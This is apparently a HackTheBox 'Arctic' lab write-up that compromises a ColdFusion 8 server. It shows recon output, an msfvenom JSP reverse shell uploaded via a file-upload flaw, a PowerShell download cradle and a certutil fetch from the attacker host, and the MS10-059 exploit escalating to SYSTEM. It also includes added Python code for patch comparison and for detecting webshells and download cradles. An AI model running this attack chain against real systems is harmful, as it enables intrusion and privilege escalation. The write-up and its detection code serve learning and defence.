Arctic

Introduction:
Recon
nmap -sS -sV -sC -T4 -O -oN nmap.arctic.txt 10.10.10.11
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-01 08:04 EST
Nmap scan report for 10.10.10.11
Host is up (0.014s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.89 seconds

Enumeration
root@kinetic:~# searchsploit coldfusion 8
-------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                          |  Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                    | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                 | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                    | multiple/remote/16985.rb
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution            | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload                                                          | multiple/webapps/45979.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                              | windows/webapps/27755.txt
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                        | multiple/webapps/40346.py
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting           | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site S | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting  | cfm/webapps/33168.txt
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution                    | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages                                          | windows/local/19220.c
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)                                      | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure                                                                | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting                                                  | cfm/remote/21548.txt
ColdFusion Scripts Red_Reservations - Database Disclosure                                              | asp/webapps/7440.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure                              | multiple/remote/22867.pl
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


Interesting exploits are:
1. cfm/webapps/16788.rb
2. windows/webapps/27755.txt (Not sure if this applies to ColdFusion 8.0)

Exploitation
(py2) root@kinetic:…/hackthebox/arctic/data# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f raw > shell.jsp
Payload size: 1497 bytes
(py2) root@kinetic:…/hackthebox/arctic/data# python ./http_arb_file_upload.py arctic.htb 8500 ./shell.jsp
Sending payload…
Successfully uploaded payload! Find it at http://arctic.htb:8500/userfiles/file/CS8JD1A7.jsp
(py2) root@kinetic:…/hackthebox/arctic/data#

eneloop@kinetic:…/hackthebox/arctic/data$ nc -lvnp 4444
listening on [any] 4444 …
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49339
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.25:8000/mini-reverse.ps1')
eneloop@kinetic:.../hackthebox/arctic/data$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49393
whoami
arctic\tolis

dir


    Directory: C:\ColdFusion8\runtime\bin


cd Users
dir


    Directory: C:\Users


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         22/3/2017   8:10 μμ            Administrator
d-r--         14/7/2009   7:57 πμ            Public
d----         22/3/2017   9:00 μμ            tolis



cd tolis
dir


    Directory: C:\Users\tolis


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         22/3/2017   9:00 μμ            Contacts
d-r--         22/3/2017   9:00 μμ            Desktop
d-r--         22/3/2017   9:00 μμ            Documents
d-r--         22/3/2017   9:00 μμ            Downloads
d-r--         22/3/2017   9:00 μμ            Favorites
d-r--         22/3/2017   9:00 μμ            Links
d-r--         22/3/2017   9:00 μμ            Music
d-r--         22/3/2017   9:00 μμ            Pictures
d-r--         22/3/2017   9:00 μμ            Saved Games
d-r--         22/3/2017   9:00 μμ            Searches
d-r--         22/3/2017   9:00 μμ            Videos



cd Desktop
dir


    Directory: C:\Users\tolis\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--         22/3/2017   9:01 μμ         32 user.txt



type user.txt

Post-exploit/PrivEsc

sysinfo

systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 πμ
System Boot Time:          3/1/2021, 12:25:54 πμ
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 223 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.137 MB
Virtual Memory: In Use:    910 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11


(py2) eneloop@kinetic:.../tools/winexploitsuggest/Windows-Exploit-Suggester$ ./windows-exploit-suggester.py -d ./2020-12-24-mssb.xls -i ./sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

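What Windows-Exploit-Suggester does with the systeminfo dump above is mechanical: parse the "Key: value" fields, pull the installed KB numbers out of the Hotfix(s) block, and list every bulletin for that OS whose KB is absent. On Arctic the hotfix list is "N/A", so every bulletin for 2008 R2 comes back, which is why the output is so long. The parser and comparison below is an added example, not the tool's own code; the bulletin table is a constructed four-row stand-in for the Microsoft bulletin spreadsheet (the bulletin IDs and KB numbers come from the suggester output on this page), and the second, patched sample host is constructed to show the other branch.

```python
"""Parse `systeminfo` output and report bulletins whose KB is not installed.

Added example (not Windows-Exploit-Suggester's code). The bulletin table is a
constructed stand-in for the real MS bulletin spreadsheet.
"""
import re

# Sample input, constructed from the systeminfo output on this page (trimmed).
SYSTEMINFO_SAMPLE = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Second constructed sample: same OS with three of the four KBs applied.
SYSTEMINFO_PATCHED = """\
Host Name:                 PATCHED-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB2778930
"""

# Constructed bulletin table: (bulletin, fixing KB, affected-product substring, severity).
BULLETINS = [
    ("MS10-059", "KB982799",  "Windows Server 2008 R2", "Important"),
    ("MS11-011", "KB2393802", "Windows Server 2008 R2", "Important"),
    ("MS13-005", "KB2778930", "Windows Server 2008 R2", "Important"),
    ("MS13-009", "KB2792100", "Windows Server 2008 R2", "Critical"),
]


def parse_systeminfo(text):
    """Return the top-level 'Key: value' fields plus a 'hotfixes' list of KB ids.

    Indented lines (e.g. '[01]: KB982799') continue the previous key; KB numbers
    are only collected while the current key is Hotfix(s).
    """
    fields = {}
    hotfixes = []
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():  # continuation of the previous field
            if current == "Hotfix(s)":
                m = re.search(r"KB\d+", line)
                if m:
                    hotfixes.append(m.group(0))
            continue
        key, _, value = line.partition(":")
        current = key.strip()
        fields[current] = value.strip()
    fields["hotfixes"] = hotfixes
    return fields


def missing_bulletins(info, bulletins=BULLETINS):
    """Bulletins that apply to this OS and whose fixing KB is not installed."""
    os_name = info.get("OS Name", "")
    installed = set(info["hotfixes"])
    return [b for b in bulletins if b[2] in os_name and b[1] not in installed]


if __name__ == "__main__":
    for sample in (SYSTEMINFO_SAMPLE, SYSTEMINFO_PATCHED):
        info = parse_systeminfo(sample)
        print(info["Host Name"], "-", info["OS Version"], "-", len(info["hotfixes"]), "hotfix(es)")
        for bulletin, kb, _, severity in missing_bulletins(info):
            print("  missing", bulletin, kb, severity)
```

The real spreadsheet maps each bulletin to a different KB per product and service pack, so a production check has to key on the exact OS/SP pair rather than a product substring; the structure of the comparison is the same.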
(py3) eneloop@kinetic:~/Downloads/WindowsExploits/MS10-059 - Chimichurri$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.11 - - [01/Jan/2021 10:23:43] "GET /MS10-059.exe HTTP/1.1" 200 -
10.10.10.11 - - [01/Jan/2021 10:30:30] "GET /MS10-059.exe HTTP/1.1" 200 -
10.10.10.11 - - [01/Jan/2021 10:30:33] "GET /MS10-059.exe HTTP/1.1" 200 -


C:\Users\tolis\Downloads>certutil.exe -urlcache -f http://10.10.14.25:8000/MS10-059.exe C:\Users\tolis\Downloads\MS10-059.exe
certutil.exe -urlcache -f http://10.10.14.25:8000/MS10-059.exe C:\Users\tolis\Downloads\MS10-059.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Downloads>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Users\tolis\Downloads>MS10-059.exe 10.10.14.25 4455
MS10-059.exe 10.10.14.25 4455
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\tolis\Downloads>


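From the defender's side, the whole chain on this box leaves two kinds of evidence: the Exploitation section's JSP shell is a server-executable file served out of ColdFusion's userfiles/file/ upload directory, and both the PowerShell DownloadString cradle and the certutil -urlcache fetch above are a web-server child process pulling a payload over HTTP. The block below is an added example (not from the writeup or any tool it uses) that runs both checks over constructed inputs: access-log lines in combined format and Sysmon-style process-creation records modelled on the commands shown on this page. The parent-process name jrun.exe (ColdFusion 8's JRun service) is an assumption.

```python
"""Detect a script served from an upload directory, and LOLBin downloads
spawned under the web server. Added example; all inputs are constructed.
"""
import re
from urllib.parse import urlsplit

# Constructed access-log lines (combined log format), modelled on this page.
ACCESS_LOG = [
    '10.10.14.25 - - [01/Jan/2021:10:05:12 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 200 4021',
    '10.10.14.25 - - [01/Jan/2021:10:06:40 +0200] "GET /userfiles/file/CS8JD1A7.jsp HTTP/1.1" 200 12',
    '10.10.14.30 - - [01/Jan/2021:10:07:01 +0200] "GET /userfiles/file/logo.png HTTP/1.1" 200 8311',
]

# Constructed process-creation events (Sysmon event ID 1 style fields).
# jrun.exe as the ColdFusion 8 parent process is an assumption.
PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.25:8000/mini-reverse.ps1')"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://10.10.14.25:8000/MS10-059.exe C:\Users\tolis\Downloads\MS10-059.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",   # benign use, must not alert
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -verify server.cer"},
]

SCRIPT_EXTENSIONS = (".jsp", ".jspx", ".cfm", ".cfc")
UPLOAD_PREFIX = "/userfiles/file/"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CRADLE_RE = re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*DownloadString")
CERTUTIL_RE = re.compile(r"(?i)-urlcache\b.*https?://")
WEB_SERVER_PARENTS = ("jrun.exe", "w3wp.exe")   # jrun.exe assumed for CF8; w3wp.exe is IIS
SHELLS = ("cmd.exe", "powershell.exe")


def find_webshell_requests(lines):
    """Requests for server-executable files living inside the upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path.lower()
        if path.startswith(UPLOAD_PREFIX) and path.endswith(SCRIPT_EXTENSIONS):
            hits.append({"src": m["src"], "path": path, "status": int(m["status"])})
    return hits


def find_suspicious_processes(events):
    """Download cradles, certutil-as-downloader, and shells under the web server."""
    findings = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        cmd = ev["CommandLine"]
        reasons = []
        if image == "powershell.exe" and CRADLE_RE.search(cmd):
            reasons.append("powershell download cradle")
        if image == "certutil.exe" and CERTUTIL_RE.search(cmd):
            reasons.append("certutil used as downloader")
        if parent in WEB_SERVER_PARENTS and image in SHELLS:
            reasons.append("shell spawned by web server process")
        if reasons:
            findings.append((image, reasons))
    return findings


if __name__ == "__main__":
    for hit in find_webshell_requests(ACCESS_LOG):
        print("web :", hit)
    for image, reasons in find_suspicious_processes(PROCESS_EVENTS):
        print("proc:", image, "->", "; ".join(reasons))
```

The web check is deliberately about location plus extension rather than a specific filename, since the uploaded name (CS8JD1A7.jsp here) is random; the cleaner mitigation is to deny script execution under the upload path entirely. The parent-process rule is the one that survives tool changes: whatever cradle is used, a shell under the application server is the signal.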
eneloop@kinetic:.../content/lab/hackthebox$ nc -lvnp 4455
listening on [any] 4455 ...



connect to [10.10.14.25] from (UNKNOWN) [10.10.10.11] 49231
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\tolis\Downloads>
C:\Users\tolis\Downloads>
C:\Users\tolis\Downloads>
C:\Users\tolis\Downloads>whoami
whoami
nt authority\system

C:\Users\tolis\Downloads>cd ../../
cd ../../

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator

22/03/2017  08:10 μμ    <DIR>          .
22/03/2017  08:10 μμ    <DIR>          ..
22/03/2017  07:47 μμ    <DIR>          Contacts
22/03/2017  09:02 μμ    <DIR>          Desktop
22/03/2017  07:47 μμ    <DIR>          Documents
22/03/2017  07:47 μμ    <DIR>          Downloads
22/03/2017  07:47 μμ    <DIR>          Favorites
22/03/2017  07:47 μμ    <DIR>          Links
22/03/2017  07:47 μμ    <DIR>          Music
22/03/2017  07:47 μμ    <DIR>          Pictures
22/03/2017  07:47 μμ    <DIR>          Saved Games
22/03/2017  07:47 μμ    <DIR>          Searches
22/03/2017  07:47 μμ    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  33.183.096.832 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator\Desktop

22/03/2017  09:02 μμ    <DIR>          .
22/03/2017  09:02 μμ    <DIR>          ..
22/03/2017  09:02 μμ                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.183.096.832 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ceXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXffb90
C:\Users\Administrator\Desktop>
Notes: